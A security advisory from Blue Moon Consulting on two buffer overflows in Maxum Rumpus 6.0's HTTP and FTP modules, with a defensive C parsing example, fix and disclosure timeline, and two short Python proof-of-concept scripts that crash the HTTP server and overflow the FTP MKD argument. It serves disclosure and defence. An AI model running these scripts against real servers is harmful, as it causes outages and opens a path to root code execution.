BLUE MOON SECURITY ADVISORY 2008-09
===================================


:Title: Two buffer overflows in Maxum Rumpus
:Severity: Critical
:Reporter: Blue Moon Consulting
:Products: Maxum Rumpus v6.0
:Fixed in: 6.0.1


Description
-----------

Rumpus turns any Mac into a file transfer server.

Rumpus v6.0 contains two buffer overflow vulnerabilities, one in its HTTP module and one in its FTP module. The first allows an unauthenticated user to crash Rumpus. The second may result in arbitrary code execution under superuser privilege.

The overflow in the HTTP component is caused by a missing bounds check when parsing the HTTP action verb (GET, POST, PUT, etc.). If the verb is exactly 2908 bytes long, the server runs into a segmentation fault and crashes. A manual restart is required. It has been observed that this problem occurs at other verb lengths too. This vulnerability is rated at moderate severity for the loss of service.

The overflow in the FTP component is likewise caused by a missing length check when parsing FTP commands that take an argument, such as ``MKD``, ``XMKD``, ``RMD`` and so on. The overflow occurs when the argument is copied with ``strcpy`` into an internal buffer. This buffer is 1024 bytes long. When the passed-in argument is longer than 1046 bytes, the instruction pointer is overwritten. This allows a successful attack to run arbitrary code under the privilege of a superuser (root), which is the default. Though authorization is required to exploit this security bug, the vulnerability is rated at critical severity because the FTP daemon may be configured to allow anonymous access.
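
Both bugs come down to copying a client-controlled token into a fixed-size buffer without first comparing its length to the buffer. The following C is an added illustration written for this advisory's readers; it is not Rumpus code (whose source is not public) and not part of the original advisory. It shows the bounded form of both parsers: the length is checked against the destination before anything is written, using the advisory's 1024-byte argument buffer and its 1046-byte and 2908-byte inputs as test values. The 16-byte verb limit, the function names and the constructed inputs are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of the internal argument buffer named in the advisory (1024 bytes). */
#define ARG_BUF_SIZE 1024
/* Bound on an HTTP method token; 16 is an assumed value, not one from the advisory. */
#define MAX_VERB_LEN 16

enum parse_status { PARSE_OK = 0, PARSE_TOO_LONG = 1, PARSE_MALFORMED = 2 };

/* Bounded replacement for an unchecked strcpy(): copy src_len bytes into dst
 * only if they fit together with the terminating NUL, otherwise copy nothing. */
enum parse_status copy_bounded(char *dst, size_t dst_size,
                               const char *src, size_t src_len)
{
    if (src_len >= dst_size)
        return PARSE_TOO_LONG;
    memcpy(dst, src, src_len);
    dst[src_len] = '\0';
    return PARSE_OK;
}

/* Split one FTP command line such as "MKD newdir\r\n" into the command word
 * and its argument. Both copies are bounded; trailing CR/LF is dropped. */
enum parse_status handle_ftp_line(const char *line, char *cmd, size_t cmd_size,
                                  char *arg, size_t arg_size)
{
    size_t cmd_len = strcspn(line, " \r\n");
    const char *p;
    enum parse_status st;

    if (cmd_len == 0)
        return PARSE_MALFORMED;
    st = copy_bounded(cmd, cmd_size, line, cmd_len);
    if (st != PARSE_OK)
        return st;
    p = line + cmd_len;
    while (*p == ' ')
        p++;
    return copy_bounded(arg, arg_size, p, strcspn(p, "\r\n"));
}

/* Extract the method token from an HTTP request line ("GET / HTTP/1.0\r\n").
 * An over-long token is refused before anything is written to verb. */
enum parse_status parse_http_verb(const char *request_line,
                                  char *verb, size_t verb_size)
{
    size_t len = strcspn(request_line, " \r\n");
    if (len == 0)
        return PARSE_MALFORMED;
    return copy_bounded(verb, verb_size, request_line, len);
}

/* Constructed input: an MKD command whose argument is n bytes of 'z'.
 * Returns the parser's verdict so the 1046-byte case can be checked. */
enum parse_status probe_mkd_argument(size_t n)
{
    char cmd[8], arg[ARG_BUF_SIZE];
    char *line = malloc(4 + n + 3);          /* "MKD " + arg + "\r\n" + NUL */
    enum parse_status st;

    if (line == NULL)
        return PARSE_MALFORMED;
    memcpy(line, "MKD ", 4);
    memset(line + 4, 'z', n);
    memcpy(line + 4 + n, "\r\n", 3);
    st = handle_ftp_line(line, cmd, sizeof cmd, arg, sizeof arg);
    free(line);
    return st;
}

/* Constructed input: a request line whose method token is n bytes of 'z'. */
enum parse_status probe_http_verb(size_t n)
{
    static const char tail[] = " / HTTP/1.0\r\n";
    char verb[MAX_VERB_LEN];
    char *line = malloc(n + sizeof tail);    /* sizeof tail includes the NUL */
    enum parse_status st;

    if (line == NULL)
        return PARSE_MALFORMED;
    memset(line, 'z', n);
    memcpy(line + n, tail, sizeof tail);
    st = parse_http_verb(line, verb, sizeof verb);
    free(line);
    return st;
}

int main(void)
{
    printf("MKD with 1023-byte argument: %d (0 = accepted)\n", probe_mkd_argument(1023));
    printf("MKD with 1046-byte argument: %d (1 = rejected as too long)\n", probe_mkd_argument(1046));
    printf("3-byte HTTP verb:            %d\n", probe_http_verb(3));
    printf("2908-byte HTTP verb:         %d\n", probe_http_verb(2908));
    return 0;
}
```

The check is ``src_len >= dst_size`` rather than ``>``, because the terminating NUL also needs a byte; a 1024-byte argument into a 1024-byte buffer is already one byte too many.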

Workaround
----------

There is no workaround for the first bug.

For the second bug, disable ANONYMOUS access and only allow trusted users to use FTP.

Fix
---

Maxum has released Rumpus v6.0.1, which addresses these bugs.

Disclosure
----------

Blue Moon Consulting follows `RFPolicy v2.0 <http://www.wiretrip.net/rfp/policy.html>`_ when notifying vendors.

:Initial vendor contact:

November 28, 2008: Initial contact sent to support@maxum.com

:Vendor response:

November 28, 2008: John requested that further communications be sent to the same address.

:Further communication:

November 28, 2008: Technical details and a request for regular updates on a patch sent to the vendor.

November 29, 2008: Vendor thanked us for the bug report and planned to release v6.0.1 on Monday, December 01.

December 01, 2008: Vendor released 6.0.1 and posted the release note at http://www.maxum.com/Rumpus/News601.html.

:Public disclosure: December 01, 2008

:Exploit code:

For the vulnerability in the HTTP component::

    from socket import socket, AF_INET, SOCK_STREAM

    host = "192.168.1.12"
    port = 80

    # Python 2: str is a byte string, so send() accepts it directly.
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    # A 2908-byte method token, then the blank line that ends the request.
    s.send('z' * 2908 + '\n\n')
    s.recv(1024)
    s.close()

For the vulnerability in the FTP component::

    from socket import socket, AF_INET, SOCK_STREAM

    host = "192.168.1.12"
    port = 21
    user = "regular"
    pass_ = "training"

    # Log in, then send MKD with an argument longer than the 1024-byte buffer.
    commands = [
        'user %s\n' % user,
        'pass %s\n' % pass_,
        'mkd ' + 'z' * 1046 + 'abcd\n'
    ]

    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    s.recv(1024)        # server banner
    for line in commands:
        s.send(line)
        s.recv(1024)    # reply to each command
    s.close()

Disclaimer
----------

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.
